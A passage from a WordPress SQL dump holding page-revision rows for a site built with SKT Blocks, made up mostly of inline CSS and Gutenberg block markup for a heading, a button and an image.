.block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dc07bcbb-e525-4314-b589-15be45dc4e59\"} -->\n<style type=\"text/css\"> .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dc07bcbb-e525-4314-b589-15be45dc4e59 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"d6b07e0e-145d-4fcf-b0ab-81e1597b2431\"} -->\n<style type=\"text/css\"> .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a76f9b72-1972-4fc1-9508-94e879ce8fe8\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a76f9b72-1972-4fc1-9508-94e879ce8fe8\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"ee5678bf-92ed-4865-aa79-230e1108a2f5\"} -->\n<style type=\"text/css\"> .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ee5678bf-92ed-4865-aa79-230e1108a2f5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a3a7f8e1-d3ba-413d-9b6f-e963bd071379\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"eca83834\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 18:08:06','2022-08-24 18:08:06','',336,'https://cteisys.com/?p=480',0,'revision','',0);
INSERT INTO `wp0y_posts` VALUES (481,1,'2022-08-24 18:08:56','2022-08-24 18:08:56','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f90851d4-c514-47ae-86e7-eec3151567da\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f90851d4-c514-47ae-86e7-eec3151567da background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ec9b4f49-717b-424d-8c1f-2e6b2881e683\"} -->\n<style type=\"text/css\"> .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\"} -->\n<style type=\"text/css\"> .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"2d0e433e-b09c-451a-a1f6-274a9de78652\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-2d0e433e-b09c-451a-a1f6-274a9de78652 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" 